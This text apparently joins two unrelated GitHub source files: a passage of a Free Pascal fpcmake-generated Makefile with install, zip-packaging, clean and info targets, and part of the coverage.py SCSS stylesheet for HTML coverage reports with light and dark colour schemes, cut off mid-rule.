($(AFULL_TARGET),$(AFULL_SOURCE)) override ACROSSCOMPILE=1 endif ifdef ACROSSCOMPILE override FPCOPT+=$(CROSSOPT) endif override COMPILER:=$(strip $(FPC) $(FPCOPT)) ifneq (,$(findstring -sh ,$(COMPILER))) UseEXECPPAS=1 endif ifneq (,$(findstring -s ,$(COMPILER))) ifeq ($(FULL_SOURCE),$(FULL_TARGET)) UseEXECPPAS=1 endif endif ifneq ($(UseEXECPPAS),1) EXECPPAS= else ifdef RUNBATCH EXECPPAS:=@$(RUNBATCH) $(PPAS) else EXECPPAS:=@$(PPAS) endif endif ifdef TARGET_RSTS override RSTFILES=$(addsuffix $(RSTEXT),$(TARGET_RSTS)) override CLEANRSTFILES+=$(RSTFILES) endif .PHONY: fpc_install fpc_sourceinstall fpc_exampleinstall ifdef INSTALL_UNITS override INSTALLPPUFILES+=$(addsuffix $(PPUEXT),$(INSTALL_UNITS)) endif ifdef INSTALL_BUILDUNIT override INSTALLPPUFILES:=$(filter-out $(INSTALL_BUILDUNIT)$(PPUEXT),$(INSTALLPPUFILES)) endif ifdef INSTALLPPUFILES ifneq ($(IMPORTLIBPREFIX)-$(STATICLIBEXT),$(STATICLIBPREFIX)-$(STATICLIBEXT)) override INSTALLPPULINKFILES:=$(subst $(PPUEXT),$(OEXT),$(INSTALLPPUFILES)) $(subst $(PPUEXT),$(LTOEXT),$(INSTALLPPUFILES)) $(addprefix $(STATICLIBPREFIX),$(subst $(PPUEXT),$(STATICLIBEXT),$(INSTALLPPUFILES))) $(addprefix $(IMPORTLIBPREFIX),$(subst $(PPUEXT),$(STATICLIBEXT),$(INSTALLPPUFILES))) else override INSTALLPPULINKFILES:=$(subst $(PPUEXT),$(OEXT),$(INSTALLPPUFILES)) $(subst $(PPUEXT),$(LTOEXT),$(INSTALLPPUFILES)) $(addprefix $(STATICLIBPREFIX),$(subst $(PPUEXT),$(STATICLIBEXT),$(INSTALLPPUFILES))) endif ifneq ($(UNITTARGETDIRPREFIX),) override INSTALLPPUFILENAMES:=$(notdir $(INSTALLPPUFILES)) override INSTALLPPULINKFILENAMES:=$(notdir $(INSTALLPPULINKFILES)) override INSTALLPPUFILES=$(addprefix $(UNITTARGETDIRPREFIX),$(INSTALLPPUFILENAMES)) override INSTALLPPULINKFILES=$(wildcard $(addprefix $(UNITTARGETDIRPREFIX),$(INSTALLPPULINKFILENAMES))) endif override INSTALL_CREATEPACKAGEFPC=1 endif ifdef INSTALLEXEFILES ifneq ($(TARGETDIRPREFIX),) override INSTALLEXEFILES:=$(addprefix $(TARGETDIRPREFIX),$(notdir $(INSTALLEXEFILES))) endif endif fpc_install: all $(INSTALLTARGET) ifdef INSTALLEXEFILES $(MKDIR) $(INSTALL_BINDIR) $(INSTALLEXE) $(INSTALLEXEFILES) $(INSTALL_BINDIR) endif ifdef INSTALL_CREATEPACKAGEFPC ifdef FPCMAKE ifdef PACKAGE_VERSION ifneq ($(wildcard Makefile.fpc),) $(FPCMAKE) -p -T$(CPU_TARGET)-$(OS_TARGET) Makefile.fpc $(MKDIR) $(INSTALL_UNITDIR) $(INSTALL) Package.fpc $(INSTALL_UNITDIR) endif endif endif endif ifdef INSTALLPPUFILES $(MKDIR) $(INSTALL_UNITDIR) $(INSTALL) $(INSTALLPPUFILES) $(INSTALL_UNITDIR) ifneq ($(INSTALLPPULINKFILES),) $(INSTALL) $(INSTALLPPULINKFILES) $(INSTALL_UNITDIR) endif ifneq ($(wildcard $(LIB_FULLNAME)),) $(MKDIR) $(INSTALL_LIBDIR) $(INSTALL) $(LIB_FULLNAME) $(INSTALL_LIBDIR) ifdef inUnix ln -sf $(LIB_FULLNAME) $(INSTALL_LIBDIR)/$(LIB_NAME) endif endif endif ifdef INSTALL_FILES $(MKDIR) $(INSTALL_DATADIR) $(INSTALL) $(INSTALL_FILES) $(INSTALL_DATADIR) endif fpc_sourceinstall: distclean $(MKDIR) $(INSTALL_SOURCEDIR) $(COPYTREE) $(BASEDIR)/* $(INSTALL_SOURCEDIR) fpc_exampleinstall: $(EXAMPLEINSTALLTARGET) $(addsuffix _distclean,$(TARGET_EXAMPLEDIRS)) ifdef HASEXAMPLES $(MKDIR) $(INSTALL_EXAMPLEDIR) endif ifdef EXAMPLESOURCEFILES $(COPY) $(EXAMPLESOURCEFILES) $(INSTALL_EXAMPLEDIR) endif ifdef TARGET_EXAMPLEDIRS $(COPYTREE) $(addsuffix /*,$(TARGET_EXAMPLEDIRS)) $(INSTALL_EXAMPLEDIR) endif .PHONY: fpc_distinstall fpc_distinstall: install exampleinstall .PHONY: fpc_zipinstall fpc_zipsourceinstall fpc_zipexampleinstall ifndef PACKDIR ifndef inUnix PACKDIR=$(BASEDIR)/../fpc-pack else PACKDIR=/tmp/fpc-pack endif endif ifndef ZIPNAME ifdef DIST_ZIPNAME ZIPNAME=$(DIST_ZIPNAME) else ZIPNAME=$(PACKAGE_NAME) endif endif ifndef FULLZIPNAME FULLZIPNAME=$(ZIPCROSSPREFIX)$(ZIPPREFIX)$(ZIPNAME)$(ZIPSUFFIX) endif ifndef ZIPTARGET ifdef DIST_ZIPTARGET ZIPTARGET=DIST_ZIPTARGET else ZIPTARGET=install endif endif ifndef USEZIP ifdef inUnix USETAR=1 endif endif ifndef inUnix USEZIPWRAPPER=1 endif ifdef USEZIPWRAPPER ZIPPATHSEP=$(PATHSEP) ZIPWRAPPER=$(subst /,$(PATHSEP),$(DIST_DESTDIR)/fpczip$(SRCBATCHEXT)) else ZIPPATHSEP=/ endif ZIPCMD_CDPACK:=cd $(subst /,$(ZIPPATHSEP),$(PACKDIR)) ZIPCMD_CDBASE:=cd $(subst /,$(ZIPPATHSEP),$(BASEDIR)) ifdef USETAR ZIPDESTFILE:=$(DIST_DESTDIR)/$(FULLZIPNAME)$(TAREXT) ZIPCMD_ZIP:=$(TARPROG) c$(TAROPT)f $(ZIPDESTFILE) * else ZIPDESTFILE:=$(DIST_DESTDIR)/$(FULLZIPNAME)$(ZIPEXT) ZIPCMD_ZIP:=$(subst /,$(ZIPPATHSEP),$(ZIPPROG)) -Dr $(ZIPOPT) $(ZIPDESTFILE) * endif fpc_zipinstall: $(MAKE) $(ZIPTARGET) INSTALL_PREFIX=$(PACKDIR) ZIPINSTALL=1 $(MKDIR) $(DIST_DESTDIR) $(DEL) $(ZIPDESTFILE) ifdef USEZIPWRAPPER ifneq ($(ECHOREDIR),echo) $(ECHOREDIR) -e "$(subst \,\\,$(ZIPCMD_CDPACK))" > $(ZIPWRAPPER) $(ECHOREDIR) -e "$(subst \,\\,$(ZIPCMD_ZIP))" >> $(ZIPWRAPPER) $(ECHOREDIR) -e "$(subst \,\\,$(ZIPCMD_CDBASE))" >> $(ZIPWRAPPER) else echo $(ZIPCMD_CDPACK) > $(ZIPWRAPPER) echo $(ZIPCMD_ZIP) >> $(ZIPWRAPPER) echo $(ZIPCMD_CDBASE) >> $(ZIPWRAPPER) endif ifdef inUnix /bin/sh $(ZIPWRAPPER) else ifdef RUNBATCH $(RUNBATCH) $(ZIPWRAPPER) else $(ZIPWRAPPER) endif endif $(DEL) $(ZIPWRAPPER) else $(ZIPCMD_CDPACK) ; $(ZIPCMD_ZIP) ; $(ZIPCMD_CDBASE) endif $(DELTREE) $(PACKDIR) fpc_zipsourceinstall: $(MAKE) fpc_zipinstall ZIPTARGET=sourceinstall ZIPSUFFIX=$(ZIPSOURCESUFFIX) fpc_zipexampleinstall: ifdef HASEXAMPLES $(MAKE) fpc_zipinstall ZIPTARGET=exampleinstall ZIPSUFFIX=$(ZIPEXAMPLESUFFIX) endif fpc_zipdistinstall: $(MAKE) fpc_zipinstall ZIPTARGET=distinstall .PHONY: fpc_clean fpc_cleanall fpc_distclean ifdef EXEFILES override CLEANEXEFILES:=$(addprefix $(TARGETDIRPREFIX),$(CLEANEXEFILES)) override CLEANEXEDBGFILES:=$(addprefix $(TARGETDIRPREFIX),$(CLEANEXEDBGFILES)) endif ifdef CLEAN_PROGRAMS override CLEANEXEFILES+=$(addprefix $(TARGETDIRPREFIX),$(addsuffix $(EXEEXT), $(CLEAN_PROGRAMS))) override CLEANEXEDBGFILES+=$(addprefix $(TARGETDIRPREFIX),$(addsuffix $(EXEDBGEXT), $(CLEAN_PROGRAMS))) endif ifdef CLEAN_UNITS override CLEANPPUFILES+=$(addsuffix $(PPUEXT),$(CLEAN_UNITS)) endif ifdef CLEANPPUFILES override CLEANPPULINKFILES:=$(subst $(PPUEXT),$(OEXT),$(CLEANPPUFILES)) $(subst $(PPUEXT),$(LTOEXT),$(CLEANPPUFILES)) $(addprefix $(STATICLIBPREFIX),$(subst $(PPUEXT),$(STATICLIBEXT),$(CLEANPPUFILES))) $(addprefix $(IMPORTLIBPREFIX),$(subst $(PPUEXT),$(STATICLIBEXT),$(CLEANPPUFILES))) ifdef DEBUGSYMEXT override CLEANPPULINKFILES+=$(subst $(PPUEXT),$(DEBUGSYMEXT),$(CLEANPPUFILES)) endif override CLEANPPUFILENAMES:=$(CLEANPPUFILES) override CLEANPPUFILES=$(addprefix $(UNITTARGETDIRPREFIX),$(CLEANPPUFILENAMES)) override CLEANPPULINKFILENAMES:=$(CLEANPPULINKFILES) override CLEANPPULINKFILES=$(wildcard $(addprefix $(UNITTARGETDIRPREFIX),$(CLEANPPULINKFILENAMES))) endif fpc_clean: $(CLEANTARGET) ifdef CLEANEXEFILES -$(DEL) $(CLEANEXEFILES) endif ifdef CLEANEXEDBGFILES -$(DELTREE) $(CLEANEXEDBGFILES) endif ifdef CLEANPPUFILES -$(DEL) $(CLEANPPUFILES) endif ifneq ($(CLEANPPULINKFILES),) -$(DEL) $(CLEANPPULINKFILES) endif ifdef CLEANRSTFILES -$(DEL) $(addprefix $(UNITTARGETDIRPREFIX),$(CLEANRSTFILES)) endif ifdef CLEAN_FILES -$(DEL) $(CLEAN_FILES) endif ifdef LIB_NAME -$(DEL) $(LIB_NAME) $(LIB_FULLNAME) endif -$(DEL) $(FPCMADE) *$(FULL_TARGET).fpm Package.fpc *$(ASMEXT) -$(DEL) $(FPCEXTFILE) $(REDIRFILE) script*.res link*.res *_script.res *_link.res -$(DEL) $(PPAS) *_ppas$(BATCHEXT) ppas$(BATCHEXT) ppaslink$(BATCHEXT) fpc_cleanall: $(CLEANTARGET) ifdef CLEANEXEFILES -$(DEL) $(CLEANEXEFILES) endif ifdef COMPILER_UNITTARGETDIR ifdef CLEANPPUFILES -$(DEL) $(CLEANPPUFILES) endif ifneq ($(CLEANPPULINKFILES),) -$(DEL) $(CLEANPPULINKFILES) endif ifdef CLEANRSTFILES -$(DEL) $(addprefix $(UNITTARGETDIRPREFIX),$(CLEANRSTFILES)) endif endif ifdef CLEAN_FILES -$(DEL) $(CLEAN_FILES) endif -$(DELTREE) units -$(DELTREE) bin -$(DEL) *$(OEXT) *$(LTOEXT) *$(PPUEXT) *$(RSTEXT) *$(ASMEXT) *$(STATICLIBEXT) *$(SHAREDLIBEXT) *$(PPLEXT) ifneq ($(PPUEXT),.ppu) -$(DEL) *.o *.ppu *.a endif -$(DELTREE) *$(SMARTEXT) -$(DEL) fpcmade.* Package.fpc *.fpm -$(DEL) $(FPCEXTFILE) $(REDIRFILE) script*.res link*.res *_script.res *_link.res -$(DEL) $(PPAS) *_ppas$(BATCHEXT) ppas$(BATCHEXT) ppaslink$(BATCHEXT) ifdef AOUTEXT -$(DEL) *$(AOUTEXT) endif ifdef DEBUGSYMEXT -$(DEL) *$(DEBUGSYMEXT) endif ifdef LOCALFPMAKEBIN -$(DEL) $(LOCALFPMAKEBIN) -$(DEL) $(FPMAKEBINOBJ) endif fpc_distclean: cleanall .PHONY: fpc_baseinfo override INFORULES+=fpc_baseinfo fpc_baseinfo: @$(ECHO) @$(ECHO) == Package info == @$(ECHO) Package Name..... $(PACKAGE_NAME) @$(ECHO) Package Version.. $(PACKAGE_VERSION) @$(ECHO) @$(ECHO) == Configuration info == @$(ECHO) @$(ECHO) FPC.......... $(FPC) @$(ECHO) FPC Version.. $(FPC_VERSION) @$(ECHO) Source CPU... $(CPU_SOURCE) @$(ECHO) Target CPU... $(CPU_TARGET) @$(ECHO) Source OS.... $(OS_SOURCE) @$(ECHO) Target OS.... $(OS_TARGET) @$(ECHO) Full Source.. $(FULL_SOURCE) @$(ECHO) Full Target.. $(FULL_TARGET) @$(ECHO) SourceSuffix. $(SOURCESUFFIX) @$(ECHO) TargetSuffix. $(TARGETSUFFIX) @$(ECHO) FPC fpmake... $(FPCFPMAKE) @$(ECHO) @$(ECHO) == Directory info == @$(ECHO) @$(ECHO) Required pkgs... $(REQUIRE_PACKAGES) @$(ECHO) @$(ECHO) Basedir......... $(BASEDIR) @$(ECHO) FPCDir.......... $(FPCDIR) @$(ECHO) CrossBinDir..... $(CROSSBINDIR) @$(ECHO) UnitsDir........ $(UNITSDIR) @$(ECHO) PackagesDir..... $(PACKAGESDIR) @$(ECHO) @$(ECHO) GCC library..... $(GCCLIBDIR) @$(ECHO) Other library... $(OTHERLIBDIR) @$(ECHO) @$(ECHO) == Tools info == @$(ECHO) @$(ECHO) As........ $(AS) @$(ECHO) Ld........ $(LD) @$(ECHO) Ar........ $(AR) @$(ECHO) Rc........ $(RC) @$(ECHO) @$(ECHO) Mv........ $(MVPROG) @$(ECHO) Cp........ $(CPPROG) @$(ECHO) Rm........ $(RMPROG) @$(ECHO) GInstall.. $(GINSTALL) @$(ECHO) Echo...... $(ECHO) @$(ECHO) Shell..... $(SHELL) @$(ECHO) Date...... $(DATE) @$(ECHO) FPCMake... $(FPCMAKE) @$(ECHO) PPUMove... $(PPUMOVE) @$(ECHO) Zip....... $(ZIPPROG) @$(ECHO) @$(ECHO) == Object info == @$(ECHO) @$(ECHO) Target Loaders........ $(TARGET_LOADERS) @$(ECHO) Target Units.......... $(TARGET_UNITS) @$(ECHO) Target Implicit Units. $(TARGET_IMPLICITUNITS) @$(ECHO) Target Programs....... $(TARGET_PROGRAMS) @$(ECHO) Target Dirs........... $(TARGET_DIRS) @$(ECHO) Target Examples....... $(TARGET_EXAMPLES) @$(ECHO) Target ExampleDirs.... $(TARGET_EXAMPLEDIRS) @$(ECHO) @$(ECHO) Clean Units......... $(CLEAN_UNITS) @$(ECHO) Clean Files......... $(CLEAN_FILES) @$(ECHO) @$(ECHO) Install Units....... $(INSTALL_UNITS) @$(ECHO) Install Files....... $(INSTALL_FILES) @$(ECHO) @$(ECHO) == Install info == @$(ECHO) @$(ECHO) DateStr.............. $(DATESTR) @$(ECHO) ZipName.............. $(ZIPNAME) @$(ECHO) ZipPrefix............ $(ZIPPREFIX) @$(ECHO) ZipCrossPrefix....... $(ZIPCROSSPREFIX) @$(ECHO) ZipSuffix............ $(ZIPSUFFIX) @$(ECHO) FullZipName.......... $(FULLZIPNAME) @$(ECHO) Install FPC Package.. $(INSTALL_FPCPACKAGE) @$(ECHO) @$(ECHO) Install base dir..... $(INSTALL_BASEDIR) @$(ECHO) Install binary dir... $(INSTALL_BINDIR) @$(ECHO) Install library dir.. $(INSTALL_LIBDIR) @$(ECHO) Install units dir.... $(INSTALL_UNITDIR) @$(ECHO) Install source dir... $(INSTALL_SOURCEDIR) @$(ECHO) Install doc dir...... $(INSTALL_DOCDIR) @$(ECHO) Install example dir.. $(INSTALL_EXAMPLEDIR) @$(ECHO) Install data dir..... $(INSTALL_DATADIR) @$(ECHO) @$(ECHO) Dist destination dir. $(DIST_DESTDIR) @$(ECHO) Dist zip name........ $(DIST_ZIPNAME) @$(ECHO) .PHONY: fpc_info fpc_info: $(INFORULES) .PHONY: fpc_makefile fpc_makefiles fpc_makefile_sub1 fpc_makefile_sub2 \ fpc_makefile_dirs fpc_makefile: $(FPCMAKE) -w -T$(OS_TARGET) Makefile.fpc fpc_makefile_sub1: ifdef TARGET_DIRS $(FPCMAKE) -w -T$(OS_TARGET) $(addsuffix /Makefile.fpc,$(TARGET_DIRS)) endif ifdef TARGET_EXAMPLEDIRS $(FPCMAKE) -w -T$(OS_TARGET) $(addsuffix /Makefile.fpc,$(TARGET_EXAMPLEDIRS)) endif fpc_makefile_sub2: $(addsuffix _makefile_dirs,$(TARGET_DIRS) $(TARGET_EXAMPLEDIRS)) fpc_makefile_dirs: fpc_makefile_sub1 fpc_makefile_sub2 fpc_makefiles: fpc_makefile fpc_makefile_dirs units: examples: shared: sourceinstall: fpc_sourceinstall exampleinstall: fpc_exampleinstall zipexampleinstall: fpc_zipexampleinstall info: fpc_info makefiles: fpc_makefiles .PHONY: units examples shared sourceinstall exampleinstall zipexampleinstall info makefiles ifneq ($(wildcard fpcmake.loc),) include fpcmake.loc endif override FPCOPT:=$(filter-out -FU%,$(FPCOPT)) override FPCOPT:=$(filter-out -FE%,$(FPCOPT)) override FPCOPT:=$(filter-out $(addprefix -Fu,$(COMPILER_UNITDIR)),$(FPCOPT))# Compose general fpmake-parameters ifdef FPMAKEOPT FPMAKE_OPT+=$(FPMAKEOPT) endif FPMAKE_OPT+=--localunitdir=../.. FPMAKE_OPT+=--globalunitdir=.. FPMAKE_OPT+=$(FPC_TARGETOPT) FPMAKE_OPT+=$(addprefix -o ,$(FPCOPT)) FPMAKE_OPT+=--compiler=$(FPC) FPMAKE_OPT+=-bu .NOTPARALLEL: fpmake$(SRCEXEEXT): fpmake.pp $(FPCFPMAKE) fpmake.pp $(FPMAKE_SKIP_CONFIG) $(addprefix -Fu,$(COMPILER_FPMAKE_UNITDIR)) $(FPCMAKEOPT) $(OPT) all: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) compile $(FPMAKE_OPT) smart: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) compile $(FPMAKE_OPT) -o -XX -o -CX release: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) compile $(FPMAKE_OPT) -o -dRELEASE debug: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) compile $(FPMAKE_OPT) -o -dDEBUG ifeq ($(FPMAKE_BIN_CLEAN),) clean: else clean: $(FPMAKE_BIN_CLEAN) clean $(FPMAKE_OPT) endif ifeq ($(FPMAKE_BIN_CLEAN),) distclean: $(addsuffix _distclean,$(TARGET_DIRS)) fpc_cleanall else distclean: ifdef inUnix { $(FPMAKE_BIN_CLEAN) distclean $(FPMAKE_OPT); if [ $$? != "0" ]; then { echo Something wrong with fpmake exectable. Remove the executable and call make recursively to recover.; $(DEL) $(FPMAKE_BIN_CLEAN); $(MAKE) fpc_cleanall; }; fi; } else $(FPMAKE_BIN_CLEAN) distclean $(FPMAKE_OPT) endif -$(DEL) $(LOCALFPMAKE) endif cleanall: distclean install: fpmake$(SRCEXEEXT) ifdef UNIXHier $(LOCALFPMAKE) install $(FPMAKE_OPT) --prefix=$(INSTALL_PREFIX) --baseinstalldir=$(INSTALL_LIBDIR)/fpc/$(FPC_VERSION) --unitinstalldir=$(INSTALL_UNITDIR) else $(LOCALFPMAKE) install $(FPMAKE_OPT) --prefix=$(INSTALL_BASEDIR) --baseinstalldir=$(INSTALL_BASEDIR) --unitinstalldir=$(INSTALL_UNITDIR) endif distinstall: fpmake$(SRCEXEEXT) ifdef UNIXHier $(LOCALFPMAKE) install $(FPMAKE_OPT) --prefix=$(INSTALL_PREFIX) --baseinstalldir=$(INSTALL_LIBDIR)/fpc/$(FPC_VERSION) --unitinstalldir=$(INSTALL_UNITDIR) -ie -fsp 0 else $(LOCALFPMAKE) install $(FPMAKE_OPT) --prefix=$(INSTALL_BASEDIR) --baseinstalldir=$(INSTALL_BASEDIR) --unitinstalldir=$(INSTALL_UNITDIR) -ie -fsp 0 endif zipinstall: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) zipinstall $(FPMAKE_OPT) --zipprefix=$(DIST_DESTDIR)/$(ZIPPREFIX) zipdistinstall: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) zipinstall $(FPMAKE_OPT) --zipprefix=$(DIST_DESTDIR)/$(ZIPPREFIX) -ie -fsp 0 zipsourceinstall: fpmake$(SRCEXEEXT) ifdef UNIXHier $(LOCALFPMAKE) archive $(FPMAKE_OPT) --zipprefix=$(DIST_DESTDIR)/$(ZIPPREFIX) --prefix=share/src/fpc-\$$\(PACKAGEVERSION\)/$(INSTALL_FPCSUBDIR)/\$$\(PACKAGEDIRECTORY\) else $(LOCALFPMAKE) archive $(FPMAKE_OPT) --zipprefix=$(DIST_DESTDIR)/$(ZIPPREFIX) --prefix=source\\$(INSTALL_FPCSUBDIR)\\\$$\(PACKAGEDIRECTORY\) endif
{ "pile_set_name": "Github" }
/* Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0 */ /* For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt */ // CSS styles for coverage.py HTML reports. // When you edit this file, you need to run "make css" to get the CSS file // generated, and then check in both the .scss and the .css files. // When working on the file, this command is useful: // sass --watch --style=compact --sourcemap=none --no-cache coverage/htmlfiles/style.scss:htmlcov/style.css // // OR you can process sass purely in python with `pip install pysass`, then: // pysassc --style=compact coverage/htmlfiles/style.scss coverage/htmlfiles/style.css // Ignore this comment, it's for the CSS output file: /* Don't edit this .css file. Edit the .scss file instead! */ // Dimensions $left-gutter: 3rem; // // Declare colors and variables // $font-normal: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; $font-code: SFMono-Regular, Menlo, Monaco, Consolas, monospace; $off-button-lighten: 50%; $hover-dark-amt: 95%; $focus-color: #007acc; $mis-color: #ff0000; $run-color: #00dd00; $exc-color: #808080; $par-color: #dddd00; $light-bg: #fff; $light-fg: #000; $light-gray1: #f8f8f8; $light-gray2: #eee; $light-gray3: #ccc; $light-gray4: #999; $light-gray5: #666; $light-gray6: #333; $light-pln-bg: $light-bg; $light-mis-bg: #fdd; $light-run-bg: #dfd; $light-exc-bg: $light-gray2; $light-par-bg: #ffa; $light-token-com: #008000; $light-token-str: #0451A5; $light-context-bg-color: #aef; $dark-bg: #1e1e1e; $dark-fg: #eee; $dark-gray1: #222; $dark-gray2: #333; $dark-gray3: #444; $dark-gray4: #777; $dark-gray5: #aaa; $dark-gray6: #ddd; $dark-pln-bg: $dark-bg; $dark-mis-bg: #4b1818; $dark-run-bg: #373d29; $dark-exc-bg: $dark-gray2; $dark-par-bg: #650; $dark-token-com: #6A9955; $dark-token-str: #9CDCFE; $dark-context-bg-color: #056; // // Mixins and utilities // @mixin background-dark($color) { @media (prefers-color-scheme: dark) { background: $color; } } @mixin color-dark($color) { @media (prefers-color-scheme: dark) { color: $color; } } @mixin border-color-dark($color) { @media (prefers-color-scheme: dark) { border-color: $color; } } // Add visual outline to navigable elements on focus improve accessibility. @mixin focus-border { &:active, &:focus { outline: 2px dashed $focus-color; } } // Page-wide styles html, body, h1, h2, h3, p, table, td, th { margin: 0; padding: 0; border: 0; font-weight: inherit; font-style: inherit; font-size: 100%; font-family: inherit; vertical-align: baseline; } // Set baseline grid to 16 pt. body { font-family: $font-normal; font-size: 1em; background: $light-bg; color: $light-fg; @include background-dark($dark-bg); @include color-dark($dark-fg); } html>body { font-size: 16px; } a { @include focus-border; } p { font-size: .875em; line-height: 1.4em; } table { border-collapse: collapse; } td { vertical-align: top; } table tr.hidden { display: none !important; } p#no_rows { display: none; font-size: 1.2em; } a.nav { text-decoration: none; color: inherit; &:hover { text-decoration: underline; color: inherit; } } // Page structure #header { background: $light-gray1; @include background-dark(black); width: 100%; border-bottom: 1px solid $light-gray2; @include border-color-dark($dark-gray2); } .indexfile #footer { margin: 1rem 3rem; } .pyfile #footer { margin: 1rem 1rem; } #footer .content { padding: 0; color: $light-gray5; @include color-dark($dark-gray5); font-style: italic; } #index { margin: 1rem 0 0 3rem; } // Header styles #header .content { padding: 1rem $left-gutter; } h1 { font-size: 1.25em; display: inline-block; } #filter_container { float: right; margin: 0 2em 0 0; input { width: 10em; padding: 0.2em 0.5em; border: 2px solid $light-gray3; background: $light-bg; color: $light-fg; @include border-color-dark($dark-gray3); @include background-dark($dark-bg); @include color-dark($dark-fg); &:focus { border-color: $focus-color; } } } h2.stats { margin-top: .5em; font-size: 1em; } .stats button { font-family: inherit; font-size: inherit; border: 1px solid; border-radius: .2em; color: inherit; padding: .1em .5em; margin: 1px calc(.1em + 1px); cursor: pointer; border-color: $light-gray3; @include border-color-dark($dark-gray3); @include focus-border; @include focus-border; &.run { background: mix($light-run-bg, $light-bg, $off-button-lighten); @include background-dark($dark-run-bg); &.show_run { background: $light-run-bg; @include background-dark($dark-run-bg); border: 2px solid $run-color; margin: 0 .1em; } } &.mis { background: mix($light-mis-bg, $light-bg, $off-button-lighten); @include background-dark($dark-mis-bg); &.show_mis { background: $light-mis-bg; @include background-dark($dark-mis-bg); border: 2px solid $mis-color; margin: 0 .1em; } } &.exc { background: mix($light-exc-bg, $light-bg, $off-button-lighten); @include background-dark($dark-exc-bg); &.show_exc { background: $light-exc-bg; @include background-dark($dark-exc-bg); border: 2px solid $exc-color; margin: 0 .1em; } } &.par { background: mix($light-par-bg, $light-bg, $off-button-lighten); @include background-dark($dark-par-bg); &.show_par { background: $light-par-bg; @include background-dark($dark-par-bg); border: 2px solid $par-color; margin: 0 .1em; } } } // Yellow post-it things. %popup { display: none; position: absolute; z-index: 999; background: #ffffcc; border: 1px solid #888; border-radius: .2em; color: #333; padding: .25em .5em; } // Yellow post-it's in the text listings. %in-text-popup { @extend %popup; white-space: normal; float: right; top: 1.75em; right: 1em; height: auto; } // Help panel #keyboard_icon { float: right; margin: 5px; cursor: pointer; } .help_panel { @extend %popup; padding: .5em; border: 1px solid #883; .legend { font-style: italic; margin-bottom: 1em; } .indexfile & { width: 20em; min-height: 4em; } .pyfile & { width: 16em; min-height: 8em; } } #panel_icon { float: right; cursor: pointer; } .keyhelp { margin: .75em; .key { border: 1px solid black; border-color: #888 #333 #333 #888; padding: .1em .35em; font-family: $font-code; font-weight: bold; background: #eee; } } // Source file styles // The slim bar at the left edge of the source lines, colored by coverage. $border-indicator-width: .2em; #source { padding: 1em 0 1em $left-gutter; font-family: $font-code; p { // position relative makes position:absolute pop-ups appear in the right place. position: relative; white-space: pre; * { box-sizing: border-box; } .n { float: left; text-align: right; width: $left-gutter; box-sizing: border-box; margin-left: -$left-gutter; padding-right: 1em; color: $light-gray4; @include color-dark($dark-gray4); a { text-decoration: none; color: $light-gray4; @include color-dark($dark-gray4); &:hover { text-decoration: underline; color: $light-gray4; @include color-dark($dark-gray4); } } } &.highlight .n { background: #ffdd00; } .t { display: inline-block; width: 100%; box-sizing: border-box; margin-left: -.5em; padding-left: .5em - $border-indicator-width; border-left: $border-indicator-width solid $light-bg; @include border-color-dark($dark-bg); &:hover { background: mix($light-pln-bg, $light-fg, $hover-dark-amt); @include background-dark(mix($dark-pln-bg, $dark-fg, $hover-dark-amt)); & ~ .r .annotate.long { display: block; } } // Syntax coloring .com { color: $light-token-com; @include color-dark($dark-token-com); font-style: italic; line-height: 1px; } .key { font-weight: bold; line-height: 1px; } .str { color: $light-token-str; @include color-dark($dark-token-str); } } &.mis { .t { border-left: $border-indicator-width solid $mis-color; } &.show_mis .t { background: $light-mis-bg; @include background-dark($dark-mis-bg); &:hover { background: mix($light-mis-bg, $light-fg, $hover-dark-amt); @include background-dark(mix($dark-mis-bg, $dark-fg, $hover-dark-amt)); } } } &.run { .t { border-left: $border-indicator-width solid $run-color; } &.show_run .t { background: $light-run-bg; @include background-dark($dark-run-bg); &:hover { background: mix($light-run-bg, $light-fg, $hover-dark-amt); @include background-dark(mix($dark-run-bg, $dark-fg, $hover-dark-amt)); } } } &.exc { .t { border-left: $border-indicator-width solid $exc-color; } &.show_exc .t { background: $light-exc-bg; @include background-dark($dark-exc-bg); &:hover { background: mix($light-exc-bg, $light-fg, $hover-dark-amt); @include background-dark(mix($dark-exc-bg, $dark-fg, $hover-dark-amt)); } } } &.par { .t { border-left: $border-indicator-width solid $par-color; } &.show_par .t { background: $light-par-bg; @include background-dark($dark-par-bg); &:hover { background: mix($light-par-bg, $light-fg, $hover-dark-amt); @include background-dark(mix($dark-par-bg, $dark-fg, $hover-dark-amt)); } } } .r { position: absolute; top: 0; right: 2.5em; font-family: $font-normal; } .annotate { font-family: $font-normal; color: $light-gray5; @include color-dark($dark-gray6); padding-right: .5em; &.short:hover ~ .long { display: block; } &.long { @extend %in-text-popup; width: 30em; right: 2.5em; } } input { display: none; & ~ .r label.ctx { cursor: pointer; border-radius: .25em; &::before { content: "▶ "; } &:hover { background: mix($light-context-bg-color, $light-bg, $off-button-lighten); @include background-dark(mix($dark-context-bg-color, $dark-bg, $off-button-lighten)); color: $light-gray5; @include color-dark($dark-gray5); } } &:checked ~ .r label.ctx { background: $light-context-bg-color; @include background-dark($dark-context-bg-color); color: $light-gray5; @include color-dark($dark-gray5); border-radius: .75em .75em 0 0; padding: 0 .5em; margin: -.25em 0; &::before { content: "▼ "; } } &:checked ~ .ctxs { padding: .25em .5em; overflow-y: scroll; max-height: 10.5em; } } label.ctx { color: $light-gray4; @include color-dark($dark-gray4); display: inline-block; padding: 0 .5em; font-size: .8333em; // 10/12 } .ctxs { display: block; max-height: 0; overflow-y: hidden; transition: all .2s; padding: 0 .5em; font-family: $font-normal; white-space: nowrap; background: $light-context-bg-color; @include background-dark($dark-context-bg-color); border-radius: .25em; margin-right: 1.75em; span { display: block; text-align: right; } } } } // index styles #index { font-family: $font-code; font-size: 0.875em; table.index { margin-left: -.5em; } td, th { text-align: right; width: 5em; padding: .25em .5em; border-bottom: 1px solid $light-gray2; @include border-color-dark($dark-gray2); &.name { text-align: left; width: auto; } } th { font-style: italic; color: $light-gray6; @include color-dark($dark-gray6); cursor: pointer; &:hover { background: $light-gray2; @include background-dark($dark-gray2); } &.headerSortDown, &.headerSortUp { white-space: nowrap; background: 